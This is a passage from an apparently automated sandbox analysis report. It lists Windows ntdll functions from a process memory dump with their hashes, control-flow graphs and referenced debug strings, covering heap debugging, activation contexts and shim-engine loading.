                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4537dce3509e6837da2aaed1606d56eb58b3d1534e0cd747266e0ecd22a1b36d
                                            • Instruction ID: b584117a4167ef49d7a5799e1caa12be8d37a94bf0993ef376d9503fd091655f
                                            • Opcode Fuzzy Hash: 4537dce3509e6837da2aaed1606d56eb58b3d1534e0cd747266e0ecd22a1b36d
                                            • Instruction Fuzzy Hash: B790027170160802D1807198850864A004A47D1311F95C056A1035618DCA198B5D77A1
                                            Function 36992BE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a989e0d20eec1c41254c1666c4ffb28fb1d496785a686872fbeccc63178a1fe
                                            • Instruction ID: 89433300cc390ac7219dae5100bea56ad192d36c961292e984849c51111618cf
                                            • Opcode Fuzzy Hash: 9a989e0d20eec1c41254c1666c4ffb28fb1d496785a686872fbeccc63178a1fe
                                            • Instruction Fuzzy Hash: FA90027170564842D14071988508A46005A47D0315F55C052A1074658D96298E59B661
                                            Function 36992B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8f06e96181e54bcaac261f015eaf2d155a6f1c3315d15f56bd27d155b4b9366
                                            • Instruction ID: 2c0fed77c1d074607d2059dea74df4190b11b2cf11894db1cd2caccab5e6105a
                                            • Opcode Fuzzy Hash: e8f06e96181e54bcaac261f015eaf2d155a6f1c3315d15f56bd27d155b4b9366
                                            • Instruction Fuzzy Hash: DD9002A170260003410571988518616404F47E0211B55C062E2024554DC52989956125
                                            Function 36992C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: cebe6e5153ef7459c777dec09233c69bc661321eecdc66836aba1de842b89ca7
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 36992890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1125 36992890-369928b3 1126 369ca4bc-369ca4c0 1125->1126 1127 369928b9-369928cc 1125->1127 1126->1127 1128 369ca4c6-369ca4ca 1126->1128 1129 369928dd-369928df 1127->1129 1130 369928ce-369928d7 1127->1130 1128->1127 1131 369ca4d0-369ca4d4 1128->1131 1132 369928e1-369928e5 1129->1132 1130->1129 1133 369ca57e-369ca585 1130->1133 1131->1127 1134 369ca4da-369ca4de 1131->1134 1135 36992988-3699298e 1132->1135 1136 369928eb-369928fa 1132->1136 1133->1129 1134->1127 1137 369ca4e4-369ca4eb 1134->1137 1140 36992908-3699290c 1135->1140 1138 369ca58a-369ca58d 1136->1138 1139 36992900-36992905 1136->1139 1141 369ca4ed-369ca4f4 1137->1141 1142 369ca564-369ca56c 1137->1142 1138->1140 1139->1140 1140->1132 1143 3699290e-3699291b 1140->1143 1145 369ca50b 1141->1145 1146 369ca4f6-369ca4fe 1141->1146 1142->1127 1144 369ca572-369ca576 1142->1144 1147 36992921 1143->1147 1148 369ca592-369ca599 1143->1148 1144->1127 1149 369ca57c call 369a0050 1144->1149 1151 369ca510-369ca536 call 369a0050 1145->1151 1146->1127 1150 369ca504-369ca509 1146->1150 1152 36992924-36992926 1147->1152 1154 369ca5a1-369ca5c9 call 369a0050 1148->1154 1167 369ca55d-369ca55f 1149->1167 1150->1151 1151->1167 1156 36992928-3699292a 1152->1156 1157 36992993-36992995 1152->1157 1162 3699292c-3699292e 1156->1162 1163 36992946-36992966 call 369a0050 1156->1163 1157->1156 1161 36992997-369929b1 call 369a0050 1157->1161 1175 36992969-36992974 1161->1175 1162->1163 1164 36992930-36992944 call 369a0050 1162->1164 1163->1175 1164->1163 1172 36992981-36992985 1167->1172 1175->1152 1176 36992976-36992979 1175->1176 1176->1154 1177 3699297f 1176->1177 1177->1172
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
                                            • Instruction ID: 41ace1efa1336b4a2121f51b1c0636317287eed26c49e2f5b95492f24f92e166
                                            • Opcode Fuzzy Hash: 12a82326876f1e6775b2afee132444f4421e8fcf94b59ced00d73ba63ab2495c
                                            • Instruction Fuzzy Hash: 6951F6B5E10266BFEB54DFA9C9809BEF7F8BB08244760C169E494DB241D634DE00CBE1
                                            Function 36A02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1178 36a02410-36a02433 1179 36a02439-36a0243d 1178->1179 1180 36a024ec-36a024ff 1178->1180 1179->1180 1183 36a02443-36a02447 1179->1183 1181 36a02501-36a0250a 1180->1181 1182 36a02513-36a02515 1180->1182 1181->1182 1184 36a0250c 1181->1184 1185 36a02517-36a0251b 1182->1185 1183->1180 1186 36a0244d-36a02451 1183->1186 1184->1182 1188 36a02538-36a0253e 1185->1188 1189 36a0251d-36a0252c 1185->1189 1186->1180 1187 36a02457-36a0245b 1186->1187 1187->1180 1190 36a02461-36a02468 1187->1190 1193 36a02543-36a02547 1188->1193 1191 36a02540 1189->1191 1192 36a0252e-36a02536 1189->1192 1194 36a024b6-36a024be 1190->1194 1195 36a0246a-36a02471 1190->1195 1191->1193 1192->1193 1193->1185 1196 36a02549-36a02556 1193->1196 1194->1180 1201 36a024c0-36a024c4 1194->1201 1197 36a02473-36a0247b 1195->1197 1198 36a02484 1195->1198 1199 36a02564 1196->1199 1200 36a02558-36a02562 1196->1200 1197->1180 1202 36a0247d-36a02482 1197->1202 1203 36a02489-36a024ab call 369a0510 1198->1203 1204 36a02567-36a02569 1199->1204 1200->1204 1201->1180 1205 36a024c6-36a024ea call 369a0510 1201->1205 1202->1203 1217 36a024ae-36a024b1 1203->1217 1207 36a0256b-36a0256d 1204->1207 1208 36a0258d-36a0258f 1204->1208 1205->1217 1207->1208 1213 36a0256f-36a0258b call 369a0510 1207->1213 1210 36a02591-36a02593 1208->1210 1211 36a025ae-36a025d0 call 369a0510 1208->1211 1210->1211 1215 36a02595-36a025ab call 369a0510 1210->1215 1223 36a025d3-36a025df 1211->1223 1213->1223 1215->1211 1222 36a02615-36a02619 1217->1222 1223->1204 1225 36a025e1-36a025e4 1223->1225 1226 36a02613 1225->1226 1227 36a025e6-36a02610 call 369a0510 1225->1227 1226->1222 1227->1226
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
                                            • Instruction ID: ce47cfb490a9196df954ad8d6f47354209f7cbc9af50ed6ff70e91ea482d5341
                                            • Opcode Fuzzy Hash: f039b46b7622de3b8af4c8e2ee0008c4ab1fba1f92282e0d8b9e5a89f2734948
                                            • Instruction Fuzzy Hash: 75513A79A00745AEEB20DF5DDC9087FB7F8EF48244B50846AE8D5C7645DA78EA00CF68
                                            Function 36A2A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1427 36a2a670-36a2a6e9 call 36962410 * 2 RtlDebugPrintTimes 1433 36a2a89f-36a2a8c4 call 369625b0 * 2 call 36994c30 1427->1433 1434 36a2a6ef-36a2a6fa 1427->1434 1436 36a2a724 1434->1436 1437 36a2a6fc-36a2a709 1434->1437 1441 36a2a728-36a2a734 1436->1441 1439 36a2a70b-36a2a70d 1437->1439 1440 36a2a70f-36a2a715 1437->1440 1439->1440 1443 36a2a7f3-36a2a7f5 1440->1443 1444 36a2a71b-36a2a722 1440->1444 1445 36a2a741-36a2a743 1441->1445 1446 36a2a81f-36a2a821 1443->1446 1444->1441 1447 36a2a736-36a2a73c 1445->1447 1448 36a2a745-36a2a747 1445->1448 1450 36a2a827-36a2a834 1446->1450 1451 36a2a755-36a2a77d RtlDebugPrintTimes 1446->1451 1453 36a2a73e 1447->1453 1454 36a2a74c-36a2a750 1447->1454 1448->1446 1456 36a2a836-36a2a843 1450->1456 1457 36a2a85a-36a2a866 1450->1457 1451->1433 1465 36a2a783-36a2a7a0 RtlDebugPrintTimes 1451->1465 1453->1445 1455 36a2a86c-36a2a86e 1454->1455 1455->1446 1460 36a2a845-36a2a849 1456->1460 1461 36a2a84b-36a2a851 1456->1461 1462 36a2a87b-36a2a87d 1457->1462 1460->1461 1466 36a2a857 1461->1466 1467 36a2a96b-36a2a96d 1461->1467 1463 36a2a870-36a2a876 1462->1463 1464 36a2a87f-36a2a881 1462->1464 1468 36a2a8c7-36a2a8cb 1463->1468 1469 36a2a878 1463->1469 1470 36a2a883-36a2a889 1464->1470 1465->1433 1475 36a2a7a6-36a2a7cc RtlDebugPrintTimes 1465->1475 1466->1457 1467->1470 1474 36a2a99f-36a2a9a1 1468->1474 1469->1462 1471 36a2a8d0-36a2a8f4 RtlDebugPrintTimes 1470->1471 1472 36a2a88b-36a2a89d RtlDebugPrintTimes 1470->1472 1471->1433 1478 36a2a8f6-36a2a913 RtlDebugPrintTimes 1471->1478 1472->1433 1475->1433 1480 36a2a7d2-36a2a7d4 1475->1480 1478->1433 1485 36a2a915-36a2a944 RtlDebugPrintTimes 1478->1485 1482 36a2a7d6-36a2a7e3 1480->1482 1483 36a2a7f7-36a2a80a 1480->1483 1486 36a2a7e5-36a2a7e9 1482->1486 1487 36a2a7eb-36a2a7f1 1482->1487 1484 36a2a817-36a2a819 1483->1484 1488 36a2a81b-36a2a81d 1484->1488 1489 36a2a80c-36a2a812 1484->1489 1485->1433 1493 36a2a94a-36a2a94c 1485->1493 1486->1487 1487->1443 1487->1483 1488->1446 1490 36a2a814 1489->1490 1491 36a2a868-36a2a86a 1489->1491 1490->1484 1491->1455 1494 36a2a972-36a2a985 1493->1494 1495 36a2a94e-36a2a95b 1493->1495 1498 36a2a992-36a2a994 1494->1498 1496 36a2a963-36a2a969 1495->1496 1497 36a2a95d-36a2a961 1495->1497 1496->1467 1496->1494 1497->1496 1499 36a2a996 1498->1499 1500 36a2a987-36a2a98d 1498->1500 1499->1464 1501 36a2a99b-36a2a99d 1500->1501 1502 36a2a98f 1500->1502 1501->1474 1502->1498
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP:
                                            • API String ID: 3446177414-2466845122
                                            • Opcode ID: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
                                            • Instruction ID: 468bd57b4b5ef1a4529c9ef9a59bd44ae199e0af0e6f25444b2d43a70f4e6891
                                            • Opcode Fuzzy Hash: e541c6c110b0ed1d21601264d420929633a29a24db7cbd656cba5e0bb282ef9a
                                            • Instruction Fuzzy Hash: D1A18775A483128FE705CF29C890A1AB7E6BB88354F15456AEE45DB310EBB1EC06CB91
                                            Function 36987630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1503 36987630-36987651 1504 3698768b-36987699 call 36994c30 1503->1504 1505 36987653-3698766f call 3695e660 1503->1505 1510 369c4638 1505->1510 1511 36987675-36987682 1505->1511 1514 369c463f-369c4645 1510->1514 1512 3698769a-369876a9 call 36987818 1511->1512 1513 36987684 1511->1513 1519 369876ab-369876c1 call 369877cd 1512->1519 1520 36987701-3698770a 1512->1520 1513->1504 1516 369c464b-369c46b8 call 369df290 call 36999020 RtlDebugPrintTimes BaseQueryModuleData 1514->1516 1517 369876c7-369876d0 call 36987728 1514->1517 1516->1517 1535 369c46be-369c46c6 1516->1535 1517->1520 1528 369876d2 1517->1528 1519->1514 1519->1517 1526 369876d8-369876e1 1520->1526 1530 3698770c-3698770e 1526->1530 1531 369876e3-369876f2 call 3698771b 1526->1531 1528->1526 1532 369876f4-369876f6 1530->1532 1531->1532 1537 369876f8-369876fa 1532->1537 1538 36987710-36987719 1532->1538 1535->1517 1539 369c46cc-369c46d3 1535->1539 1537->1513 1540 369876fc 1537->1540 1538->1537 1539->1517 1541 369c46d9-369c46e4 1539->1541 1542 369c47be-369c47d0 call 36992c50 1540->1542 1544 369c47b9 call 36994d48 1541->1544 1545 369c46ea-369c4723 call 369df290 call 3699aaa0 1541->1545 1542->1513 1544->1542 1552 369c473b-369c476b call 369df290 1545->1552 1553 369c4725-369c4736 call 369df290 1545->1553 1552->1517 1558 369c4771-369c477f call 3699a770 1552->1558 1553->1520 1561 369c4786-369c47a3 call 369df290 call 369ccf9e 1558->1561 1562 369c4781-369c4783 1558->1562 1561->1517 1567 369c47a9-369c47b2 1561->1567 1562->1561 1567->1558 1568 369c47b4 1567->1568 1568->1517
                                            Strings
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 369C4655
                                            • ExecuteOptions, xrefs: 369C46A0
                                            • Execute=1, xrefs: 369C4713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 369C4742
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 369C4787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 369C46FC
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 369C4725
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 3f093daa3d448020949b1d3b7faf07a865af8a4b0cf979c347d5fec14c1fc87d
                                            • Instruction ID: 45ea509e2af9f05c893e5d9fa7ffb5a624bbaee7fa4e61194f01d7b2df3b97d1
                                            • Opcode Fuzzy Hash: 3f093daa3d448020949b1d3b7faf07a865af8a4b0cf979c347d5fec14c1fc87d
                                            • Instruction Fuzzy Hash: 37514A75A00329AAEF10DBA5DC89FEE77ACEF44304F2400E9D605AB191DB319E45CF62
                                            Function 3696A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B79FA
                                            • SsHd, xrefs: 3696A3E4
                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 369B7AE6
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 369B79D0, 369B79F5
                                            • Actx , xrefs: 369B7A0C, 369B7A73
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B79D5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-1988757188
                                            • Opcode ID: 940f5e4fcbb88155bd44951fca25357991942c138127988f1cbd113fc5efa4df
                                            • Instruction ID: aea8e162f6a257f46ec049a238c054935b1aea4f217e1ec2489e9e9882b416be
                                            • Opcode Fuzzy Hash: 940f5e4fcbb88155bd44951fca25357991942c138127988f1cbd113fc5efa4df
                                            • Instruction Fuzzy Hash: 75E1A274B043018FE714CE2AC894B1AB7E9BB8437CF604A2DE955CB390DBB1D945CB92
                                            Function 3696D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B936B
                                            • GsHd, xrefs: 3696D874
                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 369B9565
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 369B9341, 369B9366
                                            • Actx , xrefs: 369B9508
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B9346
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-2196497285
                                            • Opcode ID: f8ef05118df86cac251415b382fc0a88b06056320b80ca7cad25cab7856e5257
                                            • Instruction ID: 064f8c061153acbf93c64bcee2a361b19a9e57f7d4c1d5d8d1c420295fb425af
                                            • Opcode Fuzzy Hash: f8ef05118df86cac251415b382fc0a88b06056320b80ca7cad25cab7856e5257
                                            • Instruction Fuzzy Hash: 8FE1E674A143018FEB10CF16C880B5AB7E9BF8936CF64492DE9A5DB291D771D848CB92
                                            Function 3694645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3694656C
                                              • Part of subcall function 369465B5: RtlDebugPrintTimes.NTDLL ref: 36946664
                                              • Part of subcall function 369465B5: RtlDebugPrintTimes.NTDLL ref: 369466AF
                                            Strings
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 369A9A2A
                                            • LdrpInitShimEngine, xrefs: 369A99F4, 369A9A07, 369A9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369A9A11, 369A9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 369A99ED
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 369A9A01
                                            • apphelp.dll, xrefs: 36946496
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-204845295
                                            • Opcode ID: fcfadccad542b0d4bb351d30435f3639a2022c76a0db28c35a9d18b262f69d26
                                            • Instruction ID: aefa4686467521912d91408501caeca0c4adce08cfa31eb15d18ddc1959293d1
                                            • Opcode Fuzzy Hash: fcfadccad542b0d4bb351d30435f3639a2022c76a0db28c35a9d18b262f69d26
                                            • Instruction Fuzzy Hash: 7B519E71618304DFE321DF25CC40B9B77E9FB84668F50491AF685AB2A1EA30DD05CB93
                                            Function 369CFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                            • API String ID: 3446177414-4227709934
                                            • Opcode ID: 70a9a5408893361a0ff7fffa15eba795279937f466067d77da85cf8e92067988
                                            • Instruction ID: b9d81c8269f38a05bed6516d60a6c9a50504bbafe2c2b95c60685bb1663b767c
                                            • Opcode Fuzzy Hash: 70a9a5408893361a0ff7fffa15eba795279937f466067d77da85cf8e92067988
                                            • Instruction Fuzzy Hash: 05415EB9E01209ABDB01DF99C980AEEBBB9FF48354F204159E904A7346D731DD11CBA1
                                            Function 369FFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                            • API String ID: 3446177414-3492000579
                                            • Opcode ID: 293f7cfb2a87cd378a8a896819305163f445d53cdb0238e8f2969630422b36df
                                            • Instruction ID: 9eb2240eea914656371a7aa21b95f246438aee9d32bc4c21c29a5b57b51b5386
                                            • Opcode Fuzzy Hash: 293f7cfb2a87cd378a8a896819305163f445d53cdb0238e8f2969630422b36df
                                            • Instruction Fuzzy Hash: 0A710E71924644DFDB02CFA9D8406AEFBF2FF49314F558059E941AB252CB369D82CB90
                                            Function 369465B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 369A9AF6
                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 369A9AB4
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369A9AC5, 369A9B06
                                            • LdrpLoadShimEngine, xrefs: 369A9ABB, 369A9AFC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
